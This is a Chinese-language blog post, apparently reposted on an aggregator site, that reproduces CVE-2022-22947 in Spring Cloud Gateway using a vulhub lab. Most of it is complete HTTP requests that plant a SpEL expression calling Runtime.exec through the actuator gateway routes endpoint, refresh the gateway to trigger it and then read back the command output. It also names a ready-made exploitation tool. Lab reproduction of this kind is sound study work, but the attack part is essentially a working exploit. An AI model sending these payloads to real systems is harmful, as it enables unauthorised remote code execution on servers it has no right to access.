Spring Cloud Gateway 提供了一個(gè)庫,用于在 Spring WebFlux 之上構(gòu)建 API 網(wǎng)關(guān)。

在 3.1.0 和 3.0.6 之前版本中使用 Spring Cloud Gateway 的應(yīng)用程序,在啟用、暴露和不安全網(wǎng)關(guān)執(zhí)行器端點(diǎn)時(shí)容易受到代碼注入攻擊。遠(yuǎn)程攻擊者可發(fā)出惡意構(gòu)建的請(qǐng)求,允許在遠(yuǎn)程主機(jī)上任意遠(yuǎn)程執(zhí)行。

靶場(chǎng):vulhub

參考:CVE-2022-22947漏洞復(fù)現(xiàn)

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

開啟環(huán)境:
框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問web界面:
框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

第一步,發(fā)送以下請(qǐng)求以添加包含惡意 SpEL 表達(dá)式的路由器:

//發(fā)送post請(qǐng)求,進(jìn)行抓包:
//數(shù)據(jù)包內(nèi)容:
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

執(zhí)行后:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

然后,刷新網(wǎng)關(guān)。

SpEL 表達(dá)式將在此步驟中執(zhí)行:

//數(shù)據(jù)包內(nèi)容:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

執(zhí)行后:
框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

第三,發(fā)送以下請(qǐng)求,進(jìn)行命令執(zhí)行:

注意為:請(qǐng)求方式為GET請(qǐng)求

//請(qǐng)求數(shù)據(jù)包內(nèi)容:
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

最后,發(fā)送一個(gè)刪除請(qǐng)求來刪除我們的惡意路由器:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
......

發(fā)送數(shù)據(jù)包即可:
框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

再次刷新網(wǎng)關(guān):

POST /actuator/gateway/refresh HTTP/1.1
......

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

方式二:使用工具直接利用

工具地址:SpringBootExploit

將目標(biāo)URL拋到工具當(dāng)中去,檢測(cè):

直接利用即可

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

根據(jù)工具,經(jīng)過測(cè)試驗(yàn)證,命令執(zhí)行:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

端點(diǎn)信息:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel文章來源地址http://www.zghlxwxcb.cn/news/detail-715615.html

到了這里,關(guān)于框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 框架安全-CVE 復(fù)現(xiàn)&Apache Shiro&Apache Solr漏洞復(fù)現(xiàn)

    框架安全-CVE 復(fù)現(xiàn)&Apache Shiro&Apache Solr漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等 1、開發(fā)框架-PHP-Laravel-Thinkphp 2、開發(fā)框架-Javaweb-St2-Spring 3、開發(fā)框架-Python-django-Flask 4、開發(fā)框架-Javascript-Nod

    2024年02月05日
    瀏覽(48)
  • 【安全漏洞】ThinkPHP 3.2.3 漏洞復(fù)現(xiàn)

    在 HomeControllerIndexController 下的index中傳入了一個(gè)可控參數(shù),跟進(jìn)調(diào)試看一下。 跟進(jìn) display() 一路跟進(jìn)到 fetch() ,然后一路進(jìn)入 Hook::listen(\\\'view_parse\\\', $params); 關(guān)鍵地方在這,我們之前 index 里的內(nèi)容被存入了緩存文件php文件中,連帶著我們輸入的可控的php代碼也在其中,然后包

    2024年02月12日
    瀏覽(22)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個(gè)基礎(chǔ)開源框架,其目的是用于簡化 Java 企業(yè)級(jí)應(yīng)用的開發(fā)難度和開發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報(bào)告,Spring Framework存在遠(yuǎn)程代碼執(zhí)行漏洞,在 JDK 9+ 上運(yùn)行的 Spring MVC 或 Spring WebFlux 應(yīng)用程序可能容易受到通過數(shù)據(jù)綁定的遠(yuǎn)程代碼執(zhí)行

    2023年04月21日
    瀏覽(25)
  • 框架漏洞-CVE復(fù)現(xiàn)-Apache Shiro+Apache Solr

    框架漏洞-CVE復(fù)現(xiàn)-Apache Shiro+Apache Solr

    什么是框架? ?????? 就是別人寫好包裝起來的一套工具,把你原先必須要寫的,必須要做的一些復(fù)雜的東西都寫好了放在那里,你只要調(diào)用他的方法,就可以實(shí)現(xiàn)一些本來要費(fèi)好大勁的功能。 ???????? 如果網(wǎng)站的功能是采用框架開發(fā)的,那么挖掘功能的漏洞就相當(dāng)于

    2024年02月16日
    瀏覽(19)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE

    微服務(wù)架構(gòu)與Spring Cloud 最開始時(shí),我們開發(fā)java項(xiàng)目時(shí),所有的代碼都在一個(gè)工程里,我們把它稱為單體架構(gòu)。當(dāng)我們的項(xiàng)目的代碼量越來越大時(shí),開發(fā)的成員越來越多時(shí),這時(shí)我們項(xiàng)目的性能以及我們開發(fā)的效率都會(huì)存在非常大的問題,所以對(duì)于這樣的項(xiàng)目,我們需要把它

    2023年04月14日
    瀏覽(26)
  • 【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過程(特詳細(xì))

    【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過程(特詳細(xì))

    分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過程中用心寫的,可以點(diǎn)開以下鏈接獲?。?超詳細(xì)的網(wǎng)絡(luò)安全筆記 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。該漏洞是由于Tomcat AJP協(xié)議存在缺陷而導(dǎo)致,攻擊者利用該漏洞可通過構(gòu)造特定參數(shù),讀取服務(wù)器webapp下的

    2024年02月08日
    瀏覽(24)
  • 【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)

    【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)

    漏洞詳情 Shiro 在路徑控制的時(shí)候,未能對(duì)傳入的 url 編碼進(jìn)行 decode 解碼,導(dǎo)致攻擊者可以繞過過濾器,訪問被過濾的路徑。 漏洞影響版本 Shiro 1.0.0-incubating 對(duì)應(yīng) Maven Repo 里面也有 【一一幫助安全學(xué)習(xí),所有資源獲取一一】 ①網(wǎng)絡(luò)安全學(xué)習(xí)路線 ②20份滲透測(cè)試電子書 ③安全

    2024年02月06日
    瀏覽(28)
  • 中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-Weblogic安全 2、中間件-JBoos安全 3、中間件-Jenkins安全 4、中間件-GlassFish安全 常見中間件的安全測(cè)試: 1、配置

    2024年02月08日
    瀏覽(19)
  • CVE-2022-22978 Spring-security 認(rèn)證繞過漏洞復(fù)現(xiàn)

    CVE-2022-22978 Spring-security 認(rèn)證繞過漏洞復(fù)現(xiàn)

    目錄 0x01 聲明: 0x02 簡介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: ????????Vulfocus環(huán)境搭建: ????????漏洞環(huán)境搭建: ????????打開頁面: 0x06 漏洞復(fù)現(xiàn): 0x07 流量分析: 0x08 修復(fù)建議: ????????僅供學(xué)習(xí)參考使用,請(qǐng)勿用作違法用途,否則后果自負(fù)。

    2024年02月16日
    瀏覽(29)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)復(fù)現(xiàn)

    Apache Tomcat 安全漏洞(CVE-2020-13935)復(fù)現(xiàn)

    漏洞詳情: Apache Tomcat是美國阿帕奇(Apache)軟件基金會(huì)的一款輕量級(jí)Web應(yīng)用服務(wù)器。該程序?qū)崿F(xiàn)了對(duì)Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,該漏洞源于程序沒有正確驗(yàn)證payload的長度。攻擊者可利用該漏洞造成拒絕服務(wù)(無限循環(huán))。 影響版

    2024年02月11日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包